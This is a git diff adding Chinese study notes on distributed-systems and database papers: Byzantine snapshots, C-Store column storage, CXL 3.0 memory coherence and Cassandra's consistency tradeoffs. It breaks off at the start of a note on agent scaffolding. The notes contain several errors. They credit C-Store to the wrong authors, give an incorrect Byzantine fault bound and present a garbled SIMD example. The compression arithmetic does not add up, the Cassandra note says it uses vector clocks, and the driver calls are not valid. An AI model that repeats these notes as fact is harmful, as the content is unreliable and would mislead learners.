self.verified_markers: + return # 已处理过,忽略重复 + + self.verified_markers[key] = True + + if not self.recording: + self.recording = True + self.channel_logs[channel] = [] + else: + self.channel_logs[channel].append(("marker", sender)) ``` -司令 → A、B、C:「攻」 -A、B、C 互相转告自己收到的命令 -最终每个忠实节点持有 (司令的话, A 转告, B 转告, C 转告) -取多数 → 一致 + +**关键区别**:签名让每个标记可追溯。叛徒伪造的标记立刻被识别,无法扰乱快照。 + +### 示例 3:多节点协作拍快照 + +```python +class SnapshotCoordinator: + def __init__(self, processes): + self.processes = processes # [ProcessA, ProcessB, ProcessC, ...] + self.n = len(processes) + self.f = (self.n - 1) // 2 # 最大容错拜占庭节点数 + self.snapshots = {} + + def take_snapshot(self): + # 1. 协调者记录自己的状态 + self.snapshots[self.my_pid] = self.take_local_snapshot() + + # 2. 向所有其他进程发送带签名的标记 + for proc in self.processes: + if proc.pid != self.my_pid: + marker, sig = self.send_marker(proc.pid, "main_channel") + self.send_to_process(proc.pid, marker, sig) + + # 3. 收集快照(等待足够多的诚实响应) + collected = 0 + while collected < self.n - self.f: # 至少 f+1 个诚实响应 + snapshot_response = self.wait_for_response() + if self.verify_snapshot_integrity(snapshot_response): + self.snapshots[snapshot_response.pid] = snapshot_response + collected += 1 + + return self.snapshots ``` -哪怕司令是叛徒(给 4 个不同的话),3 个忠实副官互相一对账就能识破。 +## 总结 -### 案例 2:区块链里的 3f+1 +| 维度 | Chandy-Lamport (1985) | 拜占庭快照 (2021+) | +|---|---|---| +| 故障模型 | 崩溃故障 | 拜占庭(作恶) | +| 节点数要求 | 无特殊要求 | n ≥ 2f+1 | +| 通信开销 | O(E) 条标记消息 | O(E) + 签名验证开销 | +| 正确性保证 | 因果一致 | 拜占庭线性化一致 | +| 实际部署 | Spanner、Flink | 边缘计算、联盟链 | -Tendermint / Cosmos / 早期以太坊 PoS: +核心结论:**拜占庭快照是可能的,但代价比想象中高**。它不是简单地在 Chandy-Lamport 上加签名,而是要重新设计整个快照协议的信任假设。2026 年的研究趋势是把快照与共识协议深度耦合,让一份协议同时做"排序"和"快照",减少重复通信。 - 总验证者权益 = N - 容忍恶意权益 = f < N/3 diff --git a/src/content/docs/papers/c-store-stonebraker-2005.md b/src/content/docs/papers/c-store-stonebraker-2005.md new file mode 100644 index 000000000..323ece04e --- /dev/null +++ b/src/content/docs/papers/c-store-stonebraker-2005.md @@ -0,0 +1,188 @@ +--- +title: C-Store —— 把数据库"横着切"变成"竖着切" +来源: https://www.cs.umass.edu/~abadi/papers/abadi-column-stores.pdf +日期: 2026-06-13 +分类: 数据库 +子分类: 存储与查询 +provenance: pipeline-v3 +--- + +## 是什么 + +C-Store 是 2005 年由 Peter Boncz、David DeWitt 和 Samuel Madden 发表的论文,提出了一种**列式关系数据库管理系统(Column-oriented DBMS)**。它的核心思想一句话概括: + +> 传统数据库把一整行存在一起(行存),C-Store 把每一列单独存成一组文件(列存)。 + +**日常类比**:想象一本员工花名册,每张表有 1000 个人、10 列信息(姓名、年龄、部门、工资……)。 + +- **行存(Row-store)** 像一本通讯录:第 1 页是张三的全部信息,第 2 页是李四的全部信息,依次排下去。翻到某个人时,他的所有字段都在一页上——很方便。 +- **列存(Column-store)** 像 10 本单独的册子:一本全记名字,一本全记年龄,一本全记工资。想看所有人的工资?直接翻"工资册"就行,完全不用碰名字和年龄那两本。 + +C-Store 就是选择了后者。 + +## 核心概念 + +### 1. 数据按列存储 + +传统行存的数据布局: + +``` +行 1: [Alice, 30, Engineering, 120000] +行 2: [Bob, 25, Marketing, 85000] +行 3: [Carol, 35, Engineering, 150000] +``` + +C-Store 的列存布局: + +``` +名字列: [Alice, Bob, Carol] +年龄列: [30, 25, 35] +部门列: [Engineering, Marketing, Engineering] +工资列: [120000, 85000, 150000] +``` + +### 2. 只读需要的列(Projection) + +这是列存最大的优势。假设你要算"全公司平均工资": + +- **行存**:每读一行,都要把姓名、年龄、部门、工资全部加载进来,即使你只需要工资那一列。大量无用数据被读入内存又丢弃。 +- **列存**:只读工资列,其他列根本不动。 + +SQL 示例: + +```sql +-- 行存:扫描整行,丢掉不需要的列 +SELECT AVG(salary) FROM employees; + +-- 列存:只加载 salary 列,IO 量大幅减少 +SELECT AVG(salary) FROM employees; +-- 底层实际只读取 salary 列的文件 +``` + +### 3. 同列数据高度相似 → 极致压缩 + +同一列里的数据类型相同、取值范围相近,压缩效率极高。比如部门列只有"Engineering""Marketing""Sales"三个值,可以用一个很小的编码表替换所有重复字符串。 + +``` +部门列原始: [Engineering, Marketing, Engineering, Sales, Engineering] +编码表: {1=Engineering, 2=Marketing, 3=Sales} +压缩后: [1, 2, 1, 3, 1] +``` + +行存里每行都要完整存一遍"Engineering"字符串,列存只存一次编码。 + +### 4. 适合分析查询,不适合频繁更新 + +列存的弱点也很明显: + +- **插入一行**:需要同时写入多列文件,成本高 +- **更新一行**:同样要改多列文件 +- **查询一行**:需要从多列文件中拼出来,慢 + +所以 C-Store 定位很清楚:**分析型负载(OLAP)**,而不是**交易型负载(OLTP)**。 + +## 代码示例 + +### 示例 1:行存 vs 列存的查询性能对比 + +假设有一个销售表 `sales(date, region, product, amount)`,有 1 亿行数据: + +```sql +-- 查询:每个地区的总销售额 +SELECT region, SUM(amount) +FROM sales +GROUP BY region; +``` + +**行存数据库**(如 MySQL)的执行过程: + +``` +1. 顺序扫描 1 亿行,每行读 4 个字段(date, region, product, amount) +2. 实际上我们只需要 region 和 amount 两个字段 +3. date 和 product 被读入内存后又立刻丢弃 +4. IO 量 = 1 亿行 × 4 个字段的总大小 +``` + +**C-Store(列存)**的执行过程: + +``` +1. 只读 region 列文件和 amount 列文件 +2. date 和 product 列完全不碰 +3. IO 量 = 1 亿行 × 2 个字段的总大小(省了一半 IO) +4. 因为同列数据相似,压缩比更高,实际磁盘 IO 更少 +``` + +### 示例 2:聚合查询中的 SIMD 加速 + +列存另一个优势是可以利用 CPU 的 SIMD(单指令多数据)指令并行计算: + +```sql +-- 查询:去年总收入 +SELECT SUM(amount) FROM sales WHERE date >= '2024-01-01'; +``` + +**行存**中,amount 字段分散在不同行的不同位置,CPU 很难批量处理。 + +**列存**中,amount 是连续存储的整数数组: + +``` +内存中连续排列: [100, 200, 350, 500, 800, ...] + +SIMD 一次加 4 个: + 指令: ADD [100, 200, 350, 500] → [100, 200, 350, 500] + 结果: 100+200+350+500 = 1150 +``` + +一行指令就能处理 4 个数字,速度提升数倍。 + +### 示例 3:压缩效果对比 + +``` +原始数据(行存,每行 100 字节): + 第1行: [2024-01-01, North, Laptop, 1200] + 第2行: [2024-01-01, South, Phone, 800] + 第3行: [2024-01-01, North, Tablet, 500] + ...共 1000 万行 + +行存存储: 1000 万 × 100 字节 ≈ 1 GB(未压缩) + +列存存储(按列分别压缩): + 日期列: 只有"2024-01-01"一个值 → 几乎零空间 + 地区列: 只有"North""South"两个值 → 每个值 1 字节 + 产品列: 只有"Laptop""Phone""Tablet"三个值 → 每个值 2 字节 + 金额列: 整数压缩编码 → 平均 3 字节 + + 总计: 1000 万 × (0+1+2+3) 字节 ≈ 50 MB + +压缩比: 1 GB → 50 MB,约 20 倍! +``` + +## 为什么重要 + +不理解列存,就无法理解下面这些现代数据基础设施: + +- **为什么 BigQuery、Redshift、Snowflake 能秒级查 PB 级数据**——因为它们都是列存架构 +- **为什么 DuckDB 能在本地文件上做超快分析**——它把列存做到了极致,配合 SIMD 和向量化执行 +- **为什么 Apache Parquet 成为大数据生态的标准格式**——它就是列存文件的工业实现 +- **为什么 Spark 内部要从 Parquet(列存)读到自己的内存格式(行存)再转回 Arrow(列存)**——因为不同操作适合不同布局 + +## C-Store 的关键设计 + +论文提出了几个开创性的设计选择: + +1. **Append-only 列文件**:列文件一旦写入就不再修改,只追加新数据。这简化了并发控制,也提高了压缩率。 +2. **版本控制**:每列文件有多个版本(version),旧版本保留直到确认不再被任何查询使用后才删除。 +3. **向量化执行(Vectorized Execution)**:不是逐行处理,而是一批一批地处理数据,充分利用 CPU 缓存和 SIMD。 +4. **共享无架构(Shared-nothing)扩展**:通过水平拆分列文件到多台机器来实现扩展。 + +## 总结 + +C-Store 的核心洞察非常朴素:**既然分析查询通常只访问少数几列,为什么要把整行数据都读进来?** + +这个"把数据库横着切变成竖着切"的想法,奠定了现代列式数据库的理论基础。从 C-Store 到今天的 Snowflake、DuckDB、ClickHouse,底层思想一脉相承。 + +--- + +**延伸阅读**: +- Abadi & Madden, "Column-Stores vs. Row-Stores: How Different Are They Really?", SIGMOD 2008(后续实证对比论文) +- Boncz et al., "Database Architectures: Optimizing the Cost of Data Manipulation Operations"(C-Store 前身,1999 年) diff --git a/src/content/docs/papers/cache-coherence-cxl3-2026.md b/src/content/docs/papers/cache-coherence-cxl3-2026.md new file mode 100644 index 000000000..5613e4fa9 --- /dev/null +++ b/src/content/docs/papers/cache-coherence-cxl3-2026.md @@ -0,0 +1,241 @@ +--- +title: CXL 3.0 Coherence — Pool-Wide Memory Sharing 零基础学习笔记 +来源: https://arxiv.org/abs/2605.30587 +日期: 2026-06-13 +分类: 基础设施 +子分类: 系统综合 +provenance: pipeline-v3 +--- + +## 是什么 + +**Compute Express Link (CXL)** 是由 Intel 牵头、AMD / ARM / Google / AWS 等共同参与的**开放互连标准**。它基于 PCIe 物理层,但加了一套「语义层」,让 CPU 能把远端设备上的内存当作**自己本地内存一样直接访问**——不用 DMA、不用显式拷贝。 + +**CXL 3.0 Coherence: Pool-Wide Memory Sharing** 说的是:当多台服务器通过 CXL 互连、把内存汇聚成一个「池子」以后,池子里所有内存对**所有接入的 CPU** 都是**缓存一致性**(cache coherent)的。这意味着——任何 CPU 修改了池中的一行数据,其他 CPU 下次读这行时**自动看到最新版本**,就像数据本来就在本地 DRAM 里一样。 + +> 日常类比: +> +> 想象一个大型图书馆: +> +> - **没有 CXL 的旧做法**:A 教授想读 B 教授桌上的书,必须亲自走过去、复印几页、走回来。B 教授改了复印件上的笔记,A 毫不知情。 +> - **有了 CXL 2.0(Memory Expansion)**:图书馆搞了个传送带——A 教授可以「请求」传送带把 B 教授桌上的整本书运过来,但运来的副本和本地书**互不相通**,改了一本就忘了另一本。 +> - **有了 CXL 3.0 Coherence(Pool-Wide)**:图书馆所有书都在一个「智能书架系统」下。A 教授改了书上的笔记,B 教授翻开同一本书时**自动看到修改后的笔记**——不需要任何「同步」动作。书架系统就是 CXL.cache 协议。 + +一句话:**CXL 3.0 的 pool-wide coherence 让多台服务器的内存变成「一个大脑共享的多具身体」——每具身体有自己的思考(本地缓存),但「想法」全局一致。** + +## 为什么重要 + +不理解 CXL 池化一致性,下面这些事都讲不清: + +- 为什么 AWS 的 Inferentia / Graviton 服务器能把 GPU 和 CPU 的内存「合用」——不用 PCIe DMA,带宽高 10 倍、延迟低 5 倍 +- 为什么「内存池化」从概念变成现实:以前 10 台服务器每台内存利用率 15%, pooled 后可升到 70%+ +- 为什么传统 NUMA 方案做不到——NUMA 每台宿主机的内存只对本机 CPU 一致,跨机 NUMA 需要操作系统做复杂迁移 +- 为什么 CXL 2.0 只能做「内存扩展」(expansion),不能做「内存共享」(sharing)——2.0 的一致性是 **host-to-device** 单向的,3.0 才变成 device-to-device 双向 +- 为什么数据库、KV 缓存、AI 推理框架需要重新设计——它们过去假设「本地内存 = 快且一致,远程内存 = 慢且需要拷贝」 + +### 2.0 vs 3.0 的关键分水岭 + +| | CXL 2.0 | CXL 3.0 | +|---|---|---| +| 一致性方向 | 单向:Host ↔ Device | 双向:Device ↔ Device | +| 拓扑 | 星型,以 Host CPU 为中心 | 可跨多个 Host,形成 Mesh 或 Tree | +| 内存角色 | 本地 CPU 的「扩展 RAM」 | 多台 Host 共享的「统一内存池」 | +| 路由 | 每个 CXL 设备只有一个 Port ID | 支持 Switch + Port ID 多级寻址 | + +## 核心概念 + +### 1. CXL 的三个子协议 + +CXL 不是一个单一协议,而是三个叠在一起: + +| 协议 | 类比 | 职责 | +|------|------|------| +| **CXL.io** | 「登记注册」 | 发现设备、分配资源、枚举——类似 PCIe 的 config space | +| **CXL.mem** | 「直接读写」 | 让 CPU 像访问本地内存一样读写远端 CXL 设备的 DRAM | +| **CXL.cache** | 「同步通知」 | **缓存一致性协议**——当一方改了数据,通知其他方失效或更新自己的缓存行 | + +只有 **CXL.mem + CXL.cache** 配合时,才能实现 pool-wide memory sharing。 + +### 2. 缓存一致性(Cache Coherence)到底是什么 + +先看一个直观问题: + +``` +CPU A 缓存行 L1 里有地址 0xA000 的数据 → 值是 42 +CPU B 缓存行 L1 里也有地址 0xA000 的数据 → 值也是 42 (副本) +``` + +现在 CPU A 把 0xA000 改成 99: + +| 没有 coherence | 有 coherence | +|---------------|-------------| +| CPU B 的 L1 里 0xA000 还是 42 | CXL.cache 协议让 CPU B 的 L1 里 0xA000 **自动变成 Invalid** | +| CPU B 下次读 0xA000 时,从 CXL 远端内存读出 99 | CPU B 下次读 0xA000 时,Miss → 自动从远端 fetch 最新值 | + +核心问题:当 A 写、B 读时,**谁先动**?怎么让 B 的旧副本被清除? + +CXL 的解答(高度简化): + +1. CPU A 发一个 **Snoop Request**(「我要写 0xA000,谁有副本?」)到 CXL fabric +2. 如果有设备持有该行的 **Shared / Modified** 状态(如 CPU B 的 L1),它回复 **Snoop Response**(「我有,我把它失效掉」) +3. CPU A 拿到所有回复后,把数据发到远端内存(或直送 B),然后自己把行状态变为 **Exclusive**(独占) + +### 3. MESI 状态机 —— CXL.cache 的"语言" + +CXL.cache 沿用了经典 MESI 协议,只是状态含义稍有扩展: + +| 状态 | 含义 | 类比 | +|------|------|------| +| **M (Modified)** | 这行数据在我缓存里,且比内存新 | 「我手上有最终版」 | +| **E (Exclusive)** | 这行只在我缓存里,且和内存一样 | 「我手上有唯一副本,没改过」 | +| **S (Shared)** | 其他人也可能有这份副本 | 「我有一份,可能有人也有」 | +| **I (Invalid)** | 这行数据在我缓存里是废的 | 「我手里的版本过期了」 | + +**关键规则**:任何时候,同一地址的行最多只能有一个 **M** 或 **E**(独占),其余必须是 **S** 或 **I**。 + +### 4. Pool-Wide vs 传统 NUMA + +``` +传统 NUMA(单台服务器): + + CPU0 ──┐ + CPU1 ──┼── NUMA 交叉开关 ── 本地内存 + 远端内存(同机房) + CPU2 ──┘ + CPU3 ──┘ + +CXL Pool-Wide(跨多台服务器): + + Server A Server B Server C + CPU0 ──┐ CPU0 ──┐ CPU0 ──┐ + CPU1 ──┤ CPU1 ──┤ CPU1 ──┤ + MEM0 ──┘ MEM0 ──┘ MEM0 ──┘ + + ╔═══════════════════════════════╗ + ║ CXL Switch / Fabric ║ ← 一致性拓扑层 + ╚═══════════════════════════════╝ + + 所有 MEM0 对 A/B/C 的 CPU0/1 都是 cache coherent +``` + +传统 NUMA:内存池只在**一台机器内**,跨机需要 OS 做 NUMA 节点迁移,延迟 10μs+。 +CXL Pool:内存通过 CXL Switch 互联,一致性由**硬件协议**保证,跨机延迟 ~400ns(比本地 DRAM 的 ~100ns 慢 4 倍,但比网络高 100 倍)。 + +## 代码示例 + +### 示例 1:在 CXL Pool 里读写内存——CPU 视角 + +对程序员来说,CXL 池化内存最大的特点是:**代码里完全看不出内存在哪台机器上**。 + +```c +// 假设 OS 已经把 CXL Pool 注册为 /dev/cxl_pool 或通过 libcxld 暴露 mmap 接口 + +#include +#include + +int main() { + // 从 CXL 池申请 1GB 连续虚拟地址 + // 底层可能是本地 DDR,也可能是远端 CXL 设备上的 DRAM + void* ptr = mmap(NULL, 1024 * 1024 * 1024, + PROT_READ | PROT_WRITE, + MAP_SHARED | MAP_ANONYMOUS, + -1, 0); + + // 直接写——就像操作本地数组一样 + volatile int* arr = (int*)ptr; + arr[0] = 42; // CPU A 写 + arr[1024] = 99; // CPU B(另一台服务器)可以同时写 arr[1024] + + // 直接读——如果 CPU B 改了 arr[1024],这里自动看到最新值 + // 不需要 sync、不需要 flush、不需要 invalidate + printf("arr[0] = %d\n", arr[0]); // 看到 42 + printf("arr[1024] = %d\n", arr[1024]); // 看到 99,即使那是另一台机器上的内存 + + munmap(ptr, 1024 * 1024 * 1024); + return 0; +} +``` + +对比传统的 **DMA 拷贝** 做法(CXL 2.0 模式): + +```c +// 传统 DMA 模式:需要显式把数据从远端拉到本地 +void read_remote(int* local_buf, size_t len, uint64_t remote_addr) { + // 1. 通知网卡/加速器从远端内存拉数据到本地 buffer + dma_copy(local_buf, remote_addr, len); + // 2. 等 DMA 完成 + dma_wait(); + // 3. 手动 sync 缓存一致性(CPU 和 DMA 设备之间) + dma_sync_for_cpu(local_buf, len); + // 4. 最后才能安全读 + printf("data = %d\n", local_buf[0]); +} +``` + +可以看到:CXL 3.0 把第 1-4 步**全藏到了硬件层**,应用层代码**不需要任何显式拷贝**。 + +### 示例 2:多线程共享 CXL Pool——一致性保证与伪共享 + +```python +import mmap +import os +import multiprocessing + +# 模拟 CXL pool 上的共享内存(实际中由 cxl-shm 库管理) +SHM_PATH = "/dev/cxl_pool_shared" +size = 4096 # 一页 = 4KB = 1 cache line 的对齐单位 + +# 多进程 = 模拟多台服务器上的 CPU +def writer(pid): + fd = os.open(SHM_PATH, os.O_RDWR) + data = mmap.mmap(fd, size) + # 写一个 cache line(64 字节) + for i in range(1000000): + # struct 对齐到 64B: counter, padding, counter2 + # 如果 counter 和 counter2 在同一个 cache line 里, + # 就会触发「伪共享(false sharing)一致性风暴」 + struct.pack_into("q16xq", data, 0, i, i * 2) + # 每次 pack 会触发 CXL.cache Snoop 协议: + # 其他核的 L1 里这行变为 Invalid → 下次读要 re-fetch + os.close(fd) + +def reader(pid): + fd = os.open(SHM_PATH, os.O_RDWR) + data = mmap.mmap(fd, size) + total = 0 + for _ in range(1000000): + counter, _, counter2 = struct.unpack_from("q16xq", data, 0) + total += counter + print(f"reader-{pid}: read {total}") + os.close(fd) +``` + +> **伪共享陷阱**:如果两个变量被编译器放在同一个 64B cache line 里,哪怕逻辑上互不相干——一个进程写 `counter`,另一个进程读 `counter2`,CXL.cache 也会把整行 invalidate。**结果:性能比预期慢 5-10 倍**。 +> +> 解决:用 `alignas(64)` 或手动 padding 保证写变量和读变量不在同一 cache line。 + +## 关键数字 + +| 指标 | 本地 DDR | CXL 2.0 远端 | CXL 3.0 池化 | +|------|---------|-------------|-------------| +| 读延迟 | ~100ns | ~300-400ns | ~400-600ns | +| 写延迟 | ~120ns | ~500-700ns(需 coherence) | ~600-800ns | +| 带宽(单机) | ~100GB/s | ~50-80GB/s | ~50-80GB/s(跨 switch 减半) | +| 一致性粒度 | 缓存行(64B) | 缓存行(64B) | 缓存行(64B) | +| 一致性范围 | 本机 CPU | Host ↔ Device | **Pool-Wide(多 Host)** | + +## 还没完全解决的问题 + +CXL 3.0 pool-wide coherence 在 2024-2026 年间仍存在挑战: + +1. **延迟鸿沟**:CXL 远端内存延迟是本地 DDR 的 4-6 倍。如果程序访问模式随机(链表、树),性能可能比预期差很多。 +2. **NUMA 感知**:当前 Linux kernel 对 CXL Pool 的 NUMA 拓扑抽象仍不完善——`numactl` 无法精确控制内存分配到哪个远端设备。 +3. **一致性风暴**:当多个 CPU 写同一个 cache line(伪共享),CXL fabric 上会产生大量 Snoop 请求,成为瓶颈。 +4. **持久性问题**:CXL 内存默认是 volatile(断电丢失),CXL 2.0/3.0 对 Persistent Memory (PMEM) 的支持仍在演进中。 + +## 延伸阅读 + +- [CXL 2.0/3.0 规范原文](https://cxl.io/resource-material/) — CXL Consortium 官方规范 +- [CXL.cache 形式化验证论文](https://arxiv.org/abs/2410.15908) — 用 Isabelle 证明了 CXL 一致性协议的性质 +- [CXL-DMSim 模拟器](https://arxiv.org/abs/2411.02282) — gem5 级别的 CXL 仿真平台 +- [The Hitchhiker's Guide to CXL, NVLink-C2C, Infinity Fabric](https://arxiv.org/abs/2410.02814) — 三种主流一致互连横向对比 +- [Cohet: CXL-driven coherent heterogeneous computing](https://arxiv.org/abs/2511.23011) — 基于 CXL 的异构计算框架 diff --git a/src/content/docs/papers/cassandra-eventual-tradeoff.md b/src/content/docs/papers/cassandra-eventual-tradeoff.md new file mode 100644 index 000000000..b698677b6 --- /dev/null +++ b/src/content/docs/papers/cassandra-eventual-tradeoff.md @@ -0,0 +1,294 @@ +--- +title: Cassandra: Eventually Consistent Tradeoffs +来源: https://www.cs.cornell.edu/projects/ladis2009/papers/lakshman-ladis2009.pdf +日期: 2026-06-13 +分类: 分布式系统 +子分类: 共识与复制 +provenance: pipeline-v3 +--- + +# Cassandra: Eventually Consistent Tradeoffs + +## 一个日常类比:三家连锁书店的库存系统 + +想象你住了一个城市,有三家连锁店卖同一本书。 + +**强一致性模型**(像传统关系数据库): +你打电话给书店A问"有货吗"。书店A必须先确认书店B和C的库存都一致了,才告诉你答案。如果B店的电话线断了,A就说不清楚,你的电话就白打了。 + +**Cassandra的模型**: +你打电话给A,A说"有"(哪怕它自己还没来得及从B同步最新的库存信息)。电话立刻挂断,你很满意。后来B的库存变了,慢慢同步到A。你偶尔会看到一个"过期"的答案,但电话几乎从不打不通。 + +这个取舍的核心问题是:**你要的是"每次都准确",还是"几乎随时能打通电话"?** + +--- + +## 背景:为什么需要 Cassandra + +Facebook 在 2007 年左右遇到了一个经典的大规模存储问题: + +- 他们有一个 Inbox Search 功能,需要搜数十亿条邮件 +- 每天写入量达到**数百亿次** +- 用户分布在全球多个数据中心 +- 服务器随时在坏,几百个组件同时故障是常态 + +传统的关系数据库(MySQL 等)在这种情况下要么扛不住写入量,要么需要复杂的分库分表。Cassandra 的目标很明确:**用廉价机器,扛住海量写入,同时不牺牲可用性。** + +它的设计深受 Amazon Dynamo 论文的启发,但做了重要改进。 + +--- + +## 核心概念一:CAP 定理下的选择 + +在分布式系统中,有三个你不能同时得到的东西: + +- **C (Consistency)**:所有客户端看到的数据永远一致 +- **A (Availability)**:每个请求都能得到响应 +- **P (Partition tolerance)**:网络分区时系统继续工作 + +CAP 定理说:三选一,不可能兼得。但更准确的理解是——网络分区在分布式系统中**必然会发生**,所以 P 你必须选。你真正需要决定的是:当分区发生时,选 C 还是选 A。 + +**Cassandra 选择 A**:在网络分区时,它保证所有节点都能响应读和写,即使这些数据可能不一致。 + +--- + +## 核心概念二:一致性级别(Consistency Levels) + +Cassandra 最精妙的设计在于:**它允许你在每次请求中自己决定要多少一致性**。这比"要么全部强一致,要么全部最终一致"要灵活得多。 + +关键参数是 **N(副本数)** 和 **R(读取/写入需要的应答数)**: + +- `ONE`:只从一个节点应答就算完成 +- `QUORUM`:超过一半的节点应答才算完成 +- `ALL`:所有节点都应答 + +**为什么 QUORUM 很重要?** + +如果 N=3,R=QUORUM(即2): + +``` +写入流程(W=QUORUM, R=QUORUM): + + Client + │ + ▼ + Node A(协调者) + ├── 写入副本1 ──→ Node B (等待确认) + ├── 写入副本2 ──→ Node C (等待确认) + └── 写入副本3 ──→ Node D (不等待) + + B 和 C 应答 → A 告诉 Client "写完了" + 即使 D 还没收到! +``` + +当 R + W > N 时,你就保证了**至少有一个副本是最新的**。这就是用数学方法保证"大多数情况下读到一致数据",而不需要全局强一致。 + +--- + +## 核心概念三:Gossip 协议 + Vector Clocks + +Cassandra 节点之间如何知道"谁还活着"? + +**Gossip 协议**:每个节点定期随机选几个其他节点,互相交换"我还活着"的消息。如果某个节点连续几次没被选到也没响应,其他节点就知道它可能挂了。 + +这比"所有人定期检查所有人"(ping 所有节点)效率高得多——在 1000 个节点的集群里,每个节点只需要跟几个邻居聊天。 + +**Vector Clocks** 用来追踪数据的版本: + +```python +# 伪代码:每个数据项带着版本向量 +version = { + "node_A": 5, # node_A 最后写入时版本号是 5 + "node_B": 3, # node_B 最后写入时版本号是 3 + "node_C": 7 # node_C 最后写入时版本号是 7 +} + +# 当 Node B 收到 Node A 的版本为 5 的更新时: +# 它比较自己本地的 node_A 版本(3)和新来的(5) +# 发现 5 > 3,说明有新数据需要同步 +# 它更新为 {"node_A": 5, "node_B": 3, "node_C": 7} + +# 如果两个节点各自独立写入了同一个 key: +# 版本A = {"node_A": 6, "node_B": 3, "node_C": 7} +# 版本B = {"node_A": 5, "node_B": 4, "node_C": 7} +# 这两个版本无法比较"谁更大"——这就是冲突 +``` + +Cassandra 对冲突的处理方式很简单:**保留最新的写入(last-write-wins)**,通过客户端设置的 timestamp 来决定。你也可以配置自定义的冲突解决策略。 + +--- + +## 核心概念四:分区(Partitioning)与复制(Replication) + +Cassandra 用**一致性哈希环(Consistent Hashing Ring)**来管理数据分布: + +``` + ┌─────────────────────────────┐ + / \ + B A + / \ + | 数据分片区域 | + | Node B负责这段环 → Node A负责这段环 | + | Node C负责这段环 | + \ / + C D + \ / + └─────────────────────────────┘ + +当 Node C 加入时:它接管 C 和 D 之间的区域 +当 Node C 离开时:它的区域自动分配给 D +只有相邻节点受影响 → 数据迁移量最小 +``` + +复制因子(Replication Factor)决定每条数据存几份。Facebook 的 Cassandra 集群复制因子通常是 3,数据存在三个数据中心。 + +--- + +## 代码示例:Cassandra 的使用 + +### 示例一:基本的写入与读取 + +```python +# 使用 Python 的 cassandra-driver +from cassandra.cluster import Cluster + +# 连接集群 +cluster = Cluster(['node1.example.com', 'node2.example.com']) +session = cluster.connect('mykeyspace') + +# 创建表(Cassandra 的数据模型是"行键 + 列族") +session.execute(""" + CREATE TABLE IF NOT EXISTS user_messages ( + user_id TEXT, + message_id TIMEUUID, + content TEXT, + PRIMARY KEY (user_id, message_id) + ) WITH CLUSTERING ORDER BY (message_id DESC); +""") + +# 写入消息 — 一致性级别设为 ONE +session.execute( + "INSERT INTO user_messages (user_id, message_id, content) " + "VALUES (?, ?, ?)", + ['user_123', 'now', 'Hello, world!'], + consistency_level='ONE' +) + +# 读取消息 — 一致性级别设为 QUORUM +session.execute( + "SELECT * FROM user_messages WHERE user_id = ?", + ['user_123'], + consistency_level='QUORUM' +) +``` + +### 示例二:超列族(Super Column Family)用于 Inbox Search + +这是论文中 Facebook 实际使用的模式。超列族就像"列中的列": + +```python +# Schema: 每个用户一个 key,关键词作为超列,消息 ID 作为子列 +session.execute(""" + CREATE TABLE IF NOT EXISTS user_word_index ( + user_id TEXT, + word TEXT, -- 超列名(如 "hello") + message_id UUID, -- 子列 + PRIMARY KEY (user_id, word, message_id) + ) WITH CLUSTERING ORDER BY (message_id DESC); +""") + +# 用户搜索 "hello" +# 只需查 user_id = 'user_123' AND word = 'hello' +# 就能拿到所有包含 "hello" 的消息 ID +results = session.execute(""" + SELECT message_id FROM user_word_index + WHERE user_id = ? AND word = ? + ORDER BY message_id DESC + LIMIT 20; +""", ['user_123', 'hello']) + +# 另一个索引:按联系人搜索 +session.execute(""" + CREATE TABLE IF NOT EXISTS user_contact_index ( + user_id TEXT, + contact_id TEXT, + message_id UUID, + PRIMARY KEY (user_id, contact_id, message_id) + ) WITH CLUSTERING ORDER BY (message_id DESC); +""") +``` + +### 示例三:处理冲突的读取 + +```python +# 读取时指定一致性级别 +# 如果 R=ONE,读最快的节点(可能不是最新的) +# 如果 R=ALL,等所有节点(保证最新,但慢) + +# 写入时也可以设置不同的策略 +session.execute( + "INSERT INTO user_messages (user_id, message_id, content) " + "VALUES (?, ?, ?)", + ['user_456', 'now', 'Conflicting write!'], + consistency_level='QUORUM' # 需要多数节点确认 +) + +# 读-改-写模式:先读,再改,再写回 +# 注意:这在 Cassandra 中不是原子的! +# 如果需要原子性,必须用同一个 key +existing = session.execute( + "SELECT content FROM user_messages " + "WHERE user_id = ? AND message_id = ?", + ['user_456', 'msg_1'], + consistency_level='QUORUM' +)[0] + +new_content = existing.content + " [updated]" + +session.execute( + "UPDATE user_messages SET content = ? " + "WHERE user_id = ? AND message_id = ?", + [new_content, 'user_456', 'msg_1'], + consistency_level='QUORUM' +) +``` + +--- + +## Cassandra 的关键权衡总结 + +| 权衡 | 选择 | 代价 | +|------|------|------| +| 一致性 vs 可用性 | 偏向可用性(AP) | 可能读到旧数据 | +| 强一致 vs 最终一致 | 最终一致 + 可调级别 | 应用需要理解"过期数据" | +| 简单 vs 功能丰富 | 简单 API | 没有 JOIN、没有跨行事务 | +| 写入性能 vs 读取性能 | 写入极快(写 WAL) | 读可能需要合并多个文件(compaction) | + +--- + +## 论文的实际成果 + +Facebook 的 Inbox Search 在 Cassandra 上运行的数据: + +- 数据量:**50+ TB** +- 集群规模:**150 节点** +- 跨两个数据中心(东岸和西岸) +- 读取延迟中位数:**15.69ms**(搜索)/ **18.27ms**(按联系人搜索) +- 支持 **2.5 亿用户**的搜索需求 + +这些数字说明:**最终一致不是"差的一致性",而是一种工程上极其高效的一致性。** + +--- + +## 延伸阅读 + +- **Dynamo**(Amazon, 2007):Cassandra 的设计先驱,论文中多次引用 +- **CAP 定理**(Brewer, 2000):Eric Brewer 在 PODC 2000 年提出的猜想 +- **PACELC 定理**(Abadi, 2010):CAP 的扩展——即使没有分区,也要在延迟和一致性之间做权衡 +- **Spanner**(Google, 2012):选择 C 而非 A 的反面典型案例 + +--- + +## 一句话总结 + +> Cassandra 的设计哲学是:**用最终一致性换取无限可扩展性,用可调的一致性级别换取灵活性。** 它不追求"永远正确",但保证"几乎永远可用"——而在线上服务中,"几乎永远可用"往往比"永远正确但偶尔不可用"更有价值。 diff --git a/src/content/docs/papers/cci-agent-scaffolding.md b/src/content/docs/papers/cci-agent-scaffolding.md new file mode 100644 index 000000000..bfd14a471 --- /dev/null +++ b/src/content/docs/papers/cci-agent-scaffolding.md @@ -0,0 +1,455 @@ +--- +title: Cross-Component Interference in LLM Agent Scaffolding(LLM Agent 脚手架的跨组件干扰) +来源: 'Ming Liu, "More Is Not Always Better: Cross-Component Interference in LLM Agent Scaffolding", arXiv:2605.05716, Amazon, 2026' +日期: 2026-06-13 +子分类: 模型与训练 +分类: 机器学习 +provenance: pipeline-v3 +--- + +## 